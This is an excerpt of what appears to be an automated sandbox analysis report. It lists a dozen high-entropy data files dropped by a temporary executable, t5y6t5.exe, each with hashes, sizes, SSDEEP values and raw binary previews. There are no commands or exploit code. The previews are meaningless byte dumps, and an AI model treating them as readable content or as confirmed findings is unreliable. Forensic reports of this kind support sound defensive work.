                                                                                            SHA1:1BE5E77E19CF3FB7834CCAE938BA73703D423D92
                                                                                            SHA-256:506D190AF44D9B2F8DEFAA4710ADED48C5E214EFE1F01A4563B8063FF4140DAB
                                                                                            SHA-512:73EA930BB5C3F41F3AE07FAB3CDA1B61628F1E11D5C665B2190CE50EA2609E14B08C91194557784B36EE3459BB3F16E5D402294306277ADAAFCB2BFE4DEA5E2D
                                                                                            Malicious:false
                                                                                            Preview:\h.!......{.....R.:,K.@..>.Z..y.K...V%..)Z#x.....XZ..Y_...@.d..[r.v......'2IZ..u"0b.a...|.A;g......ED.>F..u.......I.2...X1.q....`...._..V..P..4.W...f.ur=}.I..G.\L..S...N!.Ld^.%x...Z..i..?....3 uv.}....T..S..h'.j.~....!.?.&.5.L).K..ck..R..%T.4.M....w....-..@..U.M......<...8...Q.@v=...w....s!;..6...b..Jj.I.8w.NS.L...>!L.....Nw>X..1..r.m....W...........*....W...T.ca.....KB.j.)&..5.D...!......y.o......>..IB..(.m.....Kd.a.F:........&'..cyC.mW..{.r...........6uz0.p/.V..t.@e..=........$8.:..'{r|.;b...+..^..X....h..32Rn..=..=.....->.....FUR.G.'..u. ...9.z...mC.0.....4J.7......Z0...g...{.Q...2.X..(.}.b.L\.6?..m.......5.(.(0.eH.oz...s!m....3.=.D!..(T.J..N.p...q.......l.....".=+....5.......).u..79w..V.D.MM..Z.G...........W ...iF..XJw...:.%....K..d.I..d"..>.VJ.IV..c...Z....Y....44...k....TE...........9.!........i.K5z.j....t....3...jHV.j5TwU...nC.s..;z.~..L/'Z..8=..-...+.0NMs.&G9..J..q......Q.M....Zgz1...]&...r:>..8.K........f.Jyg.ls2.\U..=..?..rJ7..e9H*......
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):2373
                                                                                            Entropy (8bit):7.917852453348733
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:EnkV62KaVQM9zTUczj99JnazSJUEzUV14nCoBblSzqZPVZm3Dep8t7:WHX83UEjRnazSJUEzUve2u5VZCo8F
                                                                                            MD5:94E63E3890AD3866CE7FCA18E1628E79
                                                                                            SHA1:8509139CC3DC4A45F3D296D926DBC2F19AFEC15B
                                                                                            SHA-256:63508C8DEB7D1ACF8F70A71339382A0FCBC5E0587B1573EE3CADAEE72D73AFD8
                                                                                            SHA-512:9460D3ED32415FB8AF09C5064297946F90D9B98B84442A89169DDCADD0B33534B55C6DB661052920D5B8778A0CC13E6BABDE675EE0814C1F7CAE0D8E327DD12D
                                                                                            Malicious:false
                                                                                            Preview:.fo.VHN=......... h.2h.B..T;...EC....@.y.D%d[*.:.WOT....-.fs... ...c........n".....?,..A.U>."t.9'....%........."..I.J.Y.y.2..Q....c...:.<..P ...&._.v.><. b...c.(=.cxo..3.2g.#..3>......d.W.....c.Y`......Y,)T....c>{a.3S8...<7.F...+|..s.).|5w....kL^....P ........hQ..&.H>K...h.Q...w.B...>.k..W@?m ..++...3.V..t...+...X^.&|...6ie....G.h..A..D......rl. .S.H..)..7.X:^.6t..$1"Ba...9...t..Xa1.....k....:.h6.....d.(..;H....y.>.d..7.U..K..p<.....J{.....vIVC.....XHz......%q..x.E..(.L3c....C.`.Qq@.I....6'.|.-4M.q...".r..^.s.[..Bv.m,............O5S..^j!....*l@...E*.+..U...Ql.VFp.<f/..,^.....m...j.M.. {Xl.......'.z.3.....'../P....Ay..~..z.<D.w.~.6....)=Y.(.N.5.hL.....'v9.A....0.Am.....4..6.i..n.....3.../t......n..i..IV..9D. .t'..}/.(.._....s~.:P+a.bMrmo......9\>.j/..n..C...!y...U.5.S.... .~.p.....5....i........4..+C..)}..r....F..?.z.5...$!n%r&.*...c.....v.}(.e.8H.........lk.../..W...@....v.q3...`..V........'h..0..F,.v.8t...|S.(=g..../AZ...\.YiO....N`..T.sX.K.....
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):2330
                                                                                            Entropy (8bit):7.920855568346408
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:MfaQ51c0rskBMryQl+KTCWl6V2i3A0BOhmRnHlYl0LgdaJzpQ/J2:i1cZkBQlM2i3AUOERO8g4hO2
                                                                                            MD5:1DCA5FAECC4484BCBAFF3E332C0798A3
                                                                                            SHA1:7CF3AE73FFC4EB4AE71552083248CAEAB2D76965
                                                                                            SHA-256:D946CC9830A0C555C3B44BAB4158B0BD7164D434BC7C18E9C930424C0B3F46A3
                                                                                            SHA-512:7B12B6314CA27E8A8CEF0D5A0ED6C81D2481D09BDBEB5A91E51931D9403AB83E6B419A87F8C3B969253D4C19304B94AB4927FBF40C06505DB03A3091E6A3787E
                                                                                            Malicious:false
                                                                                            Preview:...K..u......!.........-...j....J.h=i.dt....Vy0..H.>X5...P..{.J..P........I...j....?.$.+......l( .&... D........)......9....$..[.5%W....d....N.....`7..XZ|..c.-..m.{.).......q4.%...9.. ZF.}..=]2?.....f..........u?>X.9D..bOQbjd. `yOWJpe.W>.[....;.o..d....M..M....E."q7.:..a.x9 .V....S?.j.....G|.....I...s.yP.....7.lQ.......K;.=T/.^... .@.7!..........t...{s...w.k<.s.F.Aac....w@V..jU..2..W.._..|..O.mX.........X.......r4mg.`..!+7.....}d4.t..1\.0L..CI..2|..& Qian.U.X..[..*...u...... ..c.>m.\2..3.....].^..6.O~n.Q....b.5.......E....&1&..S.i...oF.De.E..1TL.]...|.w.9A."..h-[..!{.J.9..v.,..l....B.T.!B......./.. ..l&....U........;....+$~w.Z....[....`...<e.V...CJ.x...1,.v..A....BNR.G.2O..`I.=..7%!......E4.>i^F.....6....0.|...Z[..>-)_.w.9.r.o.wA........?.l...M.Q.......C..;......9.l."N..v........R....~V.L.+[.........lS..mx.7G?Sr..Y..\>m.....f.t~...}..t.:.+#<9g...5A;...h..l.,K......5j^.Rr.gK.oS.g..V.S.)......V.lVgr.l...&.v...y.f......k..y.Z.B.p-h.;F.[.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):2348
                                                                                            Entropy (8bit):7.93313173722879
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:5YAGB3B2/oHBUZCQAXWGZnjTNJVP3549l5zVWwitm6pXmovkfYcPh:GL14oDNZn3rVP35Onzo1mvAc5
                                                                                            MD5:24EBD76FCB4809137AA4348B0BA88370
                                                                                            SHA1:938226C796198439C5629BE27AC87721A7E6DF71
                                                                                            SHA-256:7A025364B197B616A30BB960F97A9EE24483E53301C90BC01E56FB4A4A9AD133
                                                                                            SHA-512:75E31674AE7258B9744193F57DA239431518C309ED681F79C6CC9E7F4BEB9A660FF37EDEBC9B96F9DCF803B1E6F48C7CE947B78E581C12C8EA2A4E379CA13E96
                                                                                            Malicious:false
                                                                                            Preview:i&.;..J.w...M......{.d..>$H......?..5;pgw.$..m^..J2!...U..-..Na.y;.WO..M.;.1.e.j.9.. G.J....zvv...@...\;.?..|xA..4..2.pC%..2....L..jf-.....`w.9....Meu."Q.2.k...i..1...-....M!3jPR....d.(3....u..x...i..vzb..rA....%..*0.>K.v8.`...*...)ILO`.n..}...CB...#.........'.l...&......h......E.%...TB.t.C.+>..."....].......y3...$+.Os.r.[..~=.wh....Kvx.BH.c3.5...7..."X.p(,9!9../.HU.j.R\.e.K.T...T.@.$j.*.Y.......EkL*..dX?..R/=.P....fa&.:\)S..[c>Ux.n%..q=....$F.w.6..CE...;..q]..L...=...:Z.f.....:(Q../...<..5.w......l...B...).@kQ..wi..`..BO.....h;...<...a.sL.....*'.i.tr..?..|.si.....jX.....+.D.h$ovYs.O........[...2|.*.Q J6$..Q.......F8..F./ygHN.J)1....@.....5..P....>.>1..K...n.T.....Yr.~I...|.Z.s..TE.l.....E...W.K...R....Z..pVo..TM%.~F.3ofRbn>.............M.|..6......r`.K ........^.Z.KY./A.L.4.F....G..R.m7^N.....u...,eG...........[......!B..".CZ...#...m.7.~.........A<."..e...V7.)g.:.N...r...38...l.a.(.....T.c.!.N.....$..6......Gal.>.+..:.XK...=...k..j.....Hg<..xr.lCR..f^
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1290
                                                                                            Entropy (8bit):7.848084291599945
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:MeMB+vZB3KJhzdEBzjQzdehLRQ9nJU3lFAcgm7017t:MegmZB3KJhzdEBYtnJU0RMu
                                                                                            MD5:CDE7EF343600A83D2DAB8D3C9DEED5F4
                                                                                            SHA1:554E161333110EF8794498D9C523CA58B3B9AD59
                                                                                            SHA-256:4CBAF968A5C53138861F346A0794DDCF9C9CA32333000F9D97E2256CD10D3C16
                                                                                            SHA-512:498DB19E174B5B0962F1D2369F64F781561EAC7D89E0CDF735E7BFB84FD68A2977428630DB13F1CCDCDE1AEEF2F5F61392B949966201475E14978975EBACF535
                                                                                            Malicious:false
                                                                                            Preview:..i.`.!........4.r..}..@..}k.I.Qc.]..:..5.[.-...........hvz......~.u.&.....*(.x.._FK-.Y.@."t%.H....&2.H. dR....i...(m...E..|Y..../=8...Vx"..W^.g.g....~..8.]w....X...&d...6..*S....I.JD...v..%.T.."W.2.......]&.9/.....w.N... .+_+..............oc<".fy.M?+.Q....N...--.>-.tx.eB..v.Z..)Uq...%.lS..X^....?*...T_..F\I..../..*..@...../.......B..`..`.}/.%.B...pL.].P.I..!Un.cw.2..t|......*/..].!..t....2.....7k.9.d....l.FQc.h...&....D.].uj.......-.....W].q..3M....mJ.V.@..p.3..C.....|........,.@..^.........&..m.p../.IP.......0..M.......ZF+..),.1........<.:._t...Dq..\..C...u.....X...A..L....Q..bi..I.]7.O..(..~m..n........Q..%U........q..f ....z+3....f.......k...tJK....aH......fgJ..e.X8.vk:T=.5.....1......o...x.....'_[h....zVG..].x.o..]J... ..l..k...Z........!....?.q..|#.'..h.}..F..;.25.*-.M[n..T......~....n5(C..HU..k.(Ft..C.;.C..%...Z...6...'.EP.=VO..7.}.....4.R*6..l.Z....6..!z...u..M..H......D..f....p... .0qf..W.?....=1*...%..[cu.f...K%.J.9.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):2358
                                                                                            Entropy (8bit):7.911910365003099
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:hOg1JjNwBKIfYGvaXo/U9moU9pNIcdBcULjgEAqm:YWdIfNlf9bIcjc6eqm
                                                                                            MD5:97E559216DEE53BCCAC50A9509F77CE7
                                                                                            SHA1:5067E5ED1117A2818DC11E89152FF138DF0F4FD2
                                                                                            SHA-256:AF549EA46AE5088F6F1C3420CAD34A3AA546FB95C340D8D2B5AC8A9F12D863A4
                                                                                            SHA-512:C40DAEACCEF7D15A55AF98AEAF9F1F324E1448E9B2FBB79814EB1FEC2500DA9C4A7A096120552D15502DB4927579559D2007A7C6970A87AD2239097BE40DEF9A
                                                                                            Malicious:false
                                                                                            Preview:.y7V.6k$.o..RP.X.....c...t..a.....k~>....b.}............5.^`.o.n...X...f..?....d...H../V.+#xOR./ .~...A.u6..X8...~p...OC..)..`..,...f...6.._|.M....AN.>..G. .......oO....,2.{w....=.d.}BXG......RkC....*.,.?..x".`..._..h..:5.Y.v.~%...6C-.{...z../p.f!..49...-+.J.'f`....h_.F~.>C.>=..7......y...b^.....v.qC61'XO..!........A..?..7...>...A...9il.*...>a...$.I.S..m.r..H.5.........Q.>&9...g..+$..>...j...i........5>^W9.'.r..$w.2q.'..%T.._.h(.}.... (...k....f..I+..iZ.....!.Y.1....0.ST3.[.C.k..|...3-N.s`..T.yx*...w.0.h.b....m....Y9/....J.B3..C/.[1.(.Q...x....6.(q..."....$G.`....U...sF.2^.*..&.Y.B.....l4.VD.t.]..l..y..D^..[)\?.VX.N..........)..X...g..a:......u..]...:..s.n"....h..o@...=.m.C......SF......{y....G.M.`.UA5........:..o. .....>Q..Id.kL`.m#.....N..j..o*RT.....s.......*..D<.z...-HLR.8d0....G.bP.....l.............;.....W8@.a...y.u.xH...D...P.|....x...s..r.c......^)..|.)U..A^."..&."....q.v..8.(..........`!.&5Gnhf&.IL...r...\.o~L........~+.p..i.....T.x.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1802
                                                                                            Entropy (8bit):7.879027154265616
                                                                                            Encrypted:false
                                                                                            SSDEEP:48:ZSQU7sg/Yk1aI9KESQPWnQgdbKs91rdIkw83p1:esggzI9316Qglz9xX3p1
                                                                                            MD5:BCF87C0A813CD0DD5F1E42B75940E9EE
                                                                                            SHA1:9AAE185F682F917E88BC56B79DC800ACB4E22B6E
                                                                                            SHA-256:574868AC686BDFB137D91FE8B648CB4A557A470148EEF87A6E402158EE9ACFF9
                                                                                            SHA-512:E37816DD6938E09F03FBDECBD265B6BCD256400FCEC152C358267E4D029ACC5C8F37840009492F4218428520F394582C7CBF7BBDCA7B271EA916821B6E77CE09
                                                                                            Malicious:false
                                                                                            Preview:.].b.#..k/.3....E..).."/.......Y<i`...:....z.]2~.....[..vHR#.S.=4....7.......I......-...<&..X.mU.Kmd.{.q.<~...LG..%........(bd.K.!..E..i..8..U.D.)........].j6.!.N.|.......}...nD._.Q;..../.W.../.<..`...(bC.7+..'..aE.V.@w.-6....4.....|.<....P0C.9g.S<.f...&.m..-.h]......j.;A.t..^......v.R..!To.b R@.N%A...0.g5+.4.R.E..1.P.......she...#........j.3m.........:...63.[,w...`..us.'.$zU.1<.<./.&|.......bc...M.aQ...s.#J<....~2.`.%=.e.fu....6M.?.(.>....k.#.n.gV..M..b...?.t.....P;G7..m.z...M..T.#.....a..P..K..X..}.....n...E-w..Ci.\O-E..3...\..f....N.;C...u....&...|O.'.......k....X.....8=n..Uqia.[.2hj.d...R&..;...mh.<.J...e..A...}`.........#P%.........j.U..;..(...f....%.....R.......o~.z~&.\.Mg........b..5..0gN....2..M..3.nG..-7;x....1.R?.VT.{Fu.W"...e.0^.?IF>...yZ..../.......4....^...42....A...5VY.=....5L....F.a'.w....6.(....AGA.'....Mk.......&V..U]Q.........<...m.+...>..}3.\.....r.@.....>.1.hn.w........P....[.KN..........GK{.f.c%.+6T..%...g....'N...
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):5898
                                                                                            Entropy (8bit):7.453565517818532
                                                                                            Encrypted:false
                                                                                            SSDEEP:96:ZFr7dX5c30sZi8YaBEOJn3yf5sx4UZRpj6pJEZWodR0bo:ZFr7LE3Zi8HBFJyAjOJEYodIo
                                                                                            MD5:D064CF49C6BF9673275E530D6F9855F6
                                                                                            SHA1:CAB32616FC3147781539E05C467D6D7C0613C995
                                                                                            SHA-256:C834DDB2B1E4BE039ADBCBFBBF2DC857AAA743350B18B49E979928FA6E5DC714
                                                                                            SHA-512:A5E90A141B116103B9D1385AC147B3902FD989BB28CD794B8BACD71083F27626B7D402F8D356862EA61E58F2C210DF963C61F5BE840891D569887F6A66C21E4B
                                                                                            Malicious:false
                                                                                            Preview:.../.E..]......'..?..5..v..Z.B...)]z...dbJc...LEj.2...E.*.tp...#d.r#....]nx<.....y..r.:..h.4....;}.D@.s.<+...M.h....5.u.;.9C[.A.F...(-.h..zs..Z....EF...'.n.:.<....=....H.1...l..Qe'..t.^...#.#.z4..!..>Pj[.-......|_.wD..Atz.],wU.P..*..m.@.wa...*...g3...p.F.b."..}.op.C...z.b.ng.*.,y..$..v..B......HT?.)]F....Ww....K.#.{......Q[.;|.C...X+.F...y...........V.6d1S.....9.s#VA"...b.G&......IE.m....$Z...1..e(....;...B...m.O9.!vw!P.$R.<.E.ry|*...S.kB.#.uw9.|.......US...A...%.!.6.[.5?..Z.j....Y..~....!..*...7m....8..uTH....M.D.d..v.2....t..)...7..p.M0O.I..K.:=....f.|<..-3D."..&).z[..aK..b...F.!..EU..5....*.P.6...kU.1ff.k....x5.p...".8.C_.o.....x......h...e...IP.V}...1.J.W..U.rr.:<..M.....;/+.D..........q(.....{r...\....8...|.T..[.......N%.C..j...m...xa...qG....b...&...V.cW...+B#.[VlG.~.L..d....'.\y.8.[.(}w.Z.].U#.l...d.....Q..=.Z.....N.wp(CKV.$........M_.~4~..={I.o|.06.hg3).......Dn....[Mj.)....V..F.....p...YS..%.~.v6..L..ys.bQ(*./?...I}../..pz.*
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.828616978481137
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:AyHfQ0DexbSvEiLCpookRGY0E4xeIxBdJLZRoTOrINiSu0/15vIBm+SMMotoHn9a:AyxOpDPAIxBdDRo2WzvIclMbAnN6
                                                                                            MD5:3B3BE1E94434D9104C454C8B372AC15C
                                                                                            SHA1:BEFFB256869840F0E988E18D4DF2934B4FF2E96A
                                                                                            SHA-256:B69127B5EC362392142C1DF973383FA347986A61AC1C358C26C8C069A3678DF5
                                                                                            SHA-512:98191162C16D00EC572194CD707A68B7830BDA5F7F0D4DEB49835639E7BFBCDA2068B1A981C844EF162F341F38B47470578488A1439FDF62CB359A404844DE6D
                                                                                            Malicious:false
                                                                                            Preview:F.;"^7.. S(.C..... .#.p....'...l...8xD...... .#.mNS.#....HR..y.J.hd...m....v.U..:...>l........,...kQT......xdl$..b...}..%M......d...J...k...,`...N.a.B......O..p...!.t.....3....E.!.&d..T...}`$B4.-F.^.e......+.IQ)..6..(.u}.U..`U...G............D.\j.N.O...Z.}..FR...."..I...j..Ti..B.;..e.2W.V..;....u<.<q,.......|`e.T3...8.*....-.p.....w=..N... .*U..ek.!U..p........../.....n....IuY..........3..g....A.g..Q.<x..+..6.G..1Ff.oO..#F..1..."...V?..LL.f..*...G[.x#.h...N.A.j3.F....G4hV...@.@.Gx....1.G.q.s_5..0.{..).m......\........U.$.?......1.+......y.U}...4....k..l}OZ..` [0I.Q..H.s7{.....H.+.f..Rj...D.vU../\..k..y6..2...Inl.Z]..3...%.......IK...:m.D.....s.g...G...q....B2%.Q..z0..E.C.MtL.Mx...jIQ.^....S..XU)d..+.c.......}MWH..z=S{.gC...6...}r.4{l..J...#.......t.`0...>!..&.jd..3.o.}...rx.X...5..0..L..]..n........t...]b.x...Q{..!j~.^.,?..Ew..i....Hf...V6.l..^.Cl...x.Qn-..d..mS..Y[.)...{.pN.V.'.$`..H..!S.^.%.z....Kk.h=K-*L...v.\EB.B.V.0cc........8Bm...!...L
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.8360934661907375
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:xZHw6yr47iCzgQmzhk5zAl90Jipyq6eibFfOp4H/GqObTL/3LPCvkvgTUeu4l6:xZQ6yr47iPBzOzI90Jipc/fFGdbfPLPp
                                                                                            MD5:2BE9E5F67C64617AF2C0086198A39309
                                                                                            SHA1:D096F1BF74CD5D81A2BB852D2CE70B4F620FF0FF
                                                                                            SHA-256:474F5A9A0AA752E15E5BAFCAB6FE74CE3D921F6C8A6C31E6D1BEDBECD7E1CEFE
                                                                                            SHA-512:C7FC09195F6F269556D8A0F779FB2339857667924B7925D4A41F989BC79C74DC5FC99CAC81190EF0B3740E666B0254F45F4417B9457CCB5DC2EB2590B9078F65
                                                                                            Malicious:false
                                                                                            Preview:g...P..G..uB......".]........E.5..tQx......O<.....!..O.l_.....z.)......k.uN\.l.....eq.r..&.T..F..2....qN.%...b.`;.^.K...ET.AZ......b|ys...EW..9.S...).Wua......HZo.....H.L.s!t<..(.Bz&a/...=........\+.|m.h..MP..4.x...@3..q....(J.}.a...#!.....,...7.-1.4....c0$.cZ.....28I....`....c.q)28..........2..-..$..T...iC..Dn..h@JE..j%0.....w..o^...W,....l.j.m.m.jhfh.....1w......t..0.#..Q.7.\.V.=..~.(V<lA<h/.,..,.LVX....{>2..4....LU8.H.~.F/...b..1%M..Q.wf..o).V){-.s......^ji....W..a....;..{...e6...1.zo@...&..,:{.|...R.J.......J..@...l.\>r..:."..7......Z.}fRw.&.....S.JHR.B#...?....gT?.1.qU...J..>..O..:,.T'....."my...wr.D .C.g..U(_ic.}!.a.".r...3K...Yd..W.....W.....1.tp.c.....G.;....l..S........'....cQ.ce.8#../..|...sJh.V.nN.E2;+..?...J.(<.......&4..m..:%...!?.)lF..3.w.'.e..9..?........W....e....]%.Nv.O.........n.=.V_.s3<.}.]5I.o..".q..b...../.......M...K..>..6\..........B.\..t!.V......v..~Z..}......|'.....;.D..V......#....>L.;%....?..u.G-.......!UQ
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.831722590993755
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:1JVwB8kI24RQxRI7BwSRx9B3ariRj/uGIROP+fuqlGUeJK5x7WHF72:1dn2SQxR+BZJI0/GgjJKP722
                                                                                            MD5:A89D335B03EEC1843D2C6A2FCE1B4332
                                                                                            SHA1:B69D6989696DCC6732738EF5B3E9FD9D8EB02A17
                                                                                            SHA-256:0227573B844D873771BB4D8160741FC08FBE226B6B084E9025CD03FB7B6BC592
                                                                                            SHA-512:98458A6FD0639BFEEB25951FDE148B7006F55C1FBFE2976C6C5D075B8EAD93374C7AA16CDE3B2C064E740D0E16A0C3DFEFCEF287C944D15A598117C3FCBBBCC5
                                                                                            Malicious:false
                                                                                            Preview:.O..3b..Lxff........C<....Q...83.<.]<....M..I./v.-.t....[.P7.2S..{W..@.E..L.m...Bu.M....R.../$.tG....w.JP.....Of...........c...i..F...){..Y..;H.i......*F.O.'-g..W..;H..BUO.%.7*....!....4.z...Y...0g...{[...8I.P.t.....<..'.._,..RA..g6....X..v.DQ....W.)W.>X._zq.8..H..j.:.....8?.n.}l(.O.$..^ic....6.."..e_?".._..F]]....l.........$-..g....ri.....4DYP}.2....S*....^..C.p1..>...n/....b..Qb..J..J.d.F......P.....,$..7J4].......gw......;...XL....T..0...KL...7...../..@>.NV....d...FV.LaV..$..#)...b.e...J.o?.V..{.A<......SG:......C....e[EBK..-.T?J7....m'.M.i6RX.GD....!./......OG...[e...Y.&.~.C.[.;._.&.}..I:x.../<m.bM7BS......q.,.66.5z.......L^.E{....s.V.~.c...9................"~.N2......;......&,.?.+.I....;......+.....p.-.1K...8..... ...x(..AX:0......#}X..0...(.%.A...f.;.Y&K...\..af...1...i.Bi4..M......9 .@]R..}E[...XP...\.M.l...~..Cy.:......Wy?.N......DB|`-......C|.j......L...@.......C.y....G.?.vE.........&..".'^F....v...7....GF.u..+w.ub..F...<.."s.Se
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.847250900025851
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:B52gpMG3K525JwYcUGcl4n1FOWKIBkHpS99ksLCx7SglmMKvMbuJGJH:PnpCUJ7ucy1FOWLkJS9usuVSS/aIh
                                                                                            MD5:F5CB9A32471258EEAFDD9792EF25AD4E
                                                                                            SHA1:DCD34B65800381848E142B2692762B7915F1B816
                                                                                            SHA-256:8F25AE49E47F1EECEEADA978A1C2D14B4896F885DC038AD3031CE5C3D1DA6041
                                                                                            SHA-512:616CB6A9A0EBB8B5EC5F59F47FAE1C60AEA0B933220730A04E877DE6C33DAE731A78BF0156F12D961852490289E6D7CA6A769D437CFA6B324203C2F34A1C9496
                                                                                            Malicious:false
                                                                                            Preview:.......-C.6_[.Rt.qE...G.j..Z..(..!.gH.E".t.w...)zGXg..l.3....i.#..)..3.K..\4...x..b._..t..<.h ...].J....9%.z...L.'Z...fpO8...'.=.y[....+...+M...EN.=... ..!.B.n/. T..,2m...>..X.w.fC1a.."t?..D..u..Y....K.#..Fd.QUW..)n}<O.......g."M%s...W(....1.6.|fZ...\.JY...o..*...8.4..3.{..3....-..#..x.N...ptu.@)=..Dr...f.......K......v.....a........^.@....uV..O!.{.......eM....E.i"E....]...B:>Pz..j6./T..w%\.....7..E.`..^.6...).......6..Ew...=*....7.j..Me...8d.n........\J..:.+z.N.;i.4VO.f.}..O\{.:..5s.8a/....3..X.X.4b...8n<*#.....,..i.A.T.Jnd/x....q.>.k...i.H......'..l..5.....%.x.A...W....w......c}...B[.7.!~...tH_.+*.|..>.+;...2@...;..jO...s?.Rv....S......S.I3.]..I._...V(<$..Q.K.........U..N]...p.*_n...DR.>.,.J+...;..s...Y.5}..X..1.......m..*...$.:.j0........>2;.Xw.....+.....n>..*..|-.>.@z....`.Z.FX^q@.$sPa..p.u}D....../!....$..z.xu9..ES.........r.;\a/.....b.....]..&'..K..>j......lp...._p..e..Y}..<...y..Ht._.F]...e{.<w,)[.]u...].N..).......%..A.Z*-..
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.825893419138719
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:pND7DuaYEw4nQCL61fOosfH/1cuoRbzgZlKXjpujSecSksBjy+rcPqE+utK7:vuBEvPjvybEZqpqbPBjtrcCEFtq
                                                                                            MD5:F7CA49F478C0D4AAF1638EC5A2CC55AE
                                                                                            SHA1:3EB62EF75AA777CE0119AE25EF840C38EB0B8EA9
                                                                                            SHA-256:B82140F612ED51D37FDD974991F4E958E49D4ED0ADAB3D59301B3B855A024DE4
                                                                                            SHA-512:761C5C94DCD8D6B7B2275EF4927596F57EB3B459776E78A2A6C67B4E4D34A4D0672AAC93D97EB9AC7F5142B6A13D6C9C0E775B07E33B4DD5B861F04B507367FD
                                                                                            Malicious:false
                                                                                            Preview:3.#.(...|.....,`......{z.-!.Q%c...u.k........6N....Jh..)..t..X..m..N...Y.cG.)..W...c1`$.-a.*....G..>..>..@.$/...$.. -...............t.^.%.{."..t........#.\.I.G..../.]...3%..!.1...6.N......y]..k....B.....!0....j<a......e..*..foV.6au......../...d..o?...?}.C.;m.3]0...s".W.F..v/.V;&....5.K.8.-..Tss.\.-......%.Z..... ..ld..,]...o.;......7..6.5.*..J~...;....l+...>U3....d...G....ru@!..C.T.q...u.....0&.......M..........J...5:....+...X.$.6..r&.:..7.`.w..*H.n-...F......M.x.i.8(4.. .P..M.-f}..+.x..F..$.....b#....ZKw.k0x..........LK.>...9V.....J...).......F....$8...;.4_.....4..............-...|C=_......pf.c...WS........_vC..54.............10l.......s.........=.K.+....4.?Co7.]K.\@U.?.E.pPa...\!.!@[..J...%Nh.e..0....C...K........[.LX..Ts/.....@.1!#.........Sg..]...-...N..r..$1X.....' x..sG.....o_.`..d-....C.M$....t.%....u.......m..`r..*..o.-~.R..X..Ls....x{.....w...x.MQ9d.\..^....%.^..>...}..13..N.3.?Mr.}...j...i.l....t..##...HF3..-.g9.
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
                                                                                            Entropy (8bit):7.830587405795095
                                                                                            Encrypted:false
                                                                                            SSDEEP:24:rF0wK+ymCEoVYbJs/xcCCzERPVkHSEqblxJlFgdRMR0ltBUv:qZ+g6bJs/WMRyyv5bgdRIsev
                                                                                            MD5:CD0AF10A86DD3C047C1E82ACEF72664D
                                                                                            SHA1:107797067FB45A68227685E05D57087C1D705430
                                                                                            SHA-256:52E8CF2FFCBB594421F3F785B6E7529854C6B73449EE80A66CBB92FE13705A97
                                                                                            SHA-512:D941E2DCE31F6F711CCF24698926700F80C0A16256773EE1C4499BDB8DB26F22B86068BAB06FC422A9E283CA3901A0B22F2DD18BDC48603E3A01F087DBEBA75C
                                                                                            Malicious:false
                                                                                            Preview:.A..f..G.vE.Q..........3...[.b].Bw...w|...%.l.$..93cT.`............"...I..T?..h..\.R?zf..L.....X|3..AE.T2:.Y..K.?U4.'..+uN..!4.?K.....({.!C...vc%.F.:...?....~R.....%..9...&D.L.5....].i..x.n. .k.P.v..r.]*.[..%...>......S.V&..Z0X,..:.LQ9..O.sp..P..r.-7V.)...z..`.k=..2..I*~..H..G.[.v.H.o....i.El.O......$q6.[....{P...-..,...~....x?.o.y.P ..u...du^......0M.....;.8.Y.....v.+B..H.Q....&..._C.n%.@.v.X.)T.P.U/.h..-...7UN?Q,.e.yM..Gr.....*<7.m9....-t...A.2Qh......23JAL4...pU..R9....z......L.a.r..].S.F..$k...3..(....7.<.o.=I....f.0..H4h1.dM#;u.J..o.........!3^..#.%s..{...e..&%.R...]...h...".PAZm..L.d.."......bT...iB..$N.I..Z).V_t...z...4..........b.O...f!<.....D>..V..\=...vI~.....r.k..."KN....UP..hH..:..;.....c.P.N_A?&_..*........w[M..g...q.V..H..u....w@MaK3I80Q.*~Y.5N.d;..i...P..O.72.+..{..3./;.,..........i.sN..0h..!....;Z5/.\.n(....D...h..j.....q.@a.my.m.}&N..R..HC8b.....fSZ33.:eQ..W...}..r..%.!.....3[.*...F....n+..f..T..m1<+..{...^-.......7
                                                                                            Process:C:\Users\user\AppData\Local\Temp\t5y6t5.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):1292
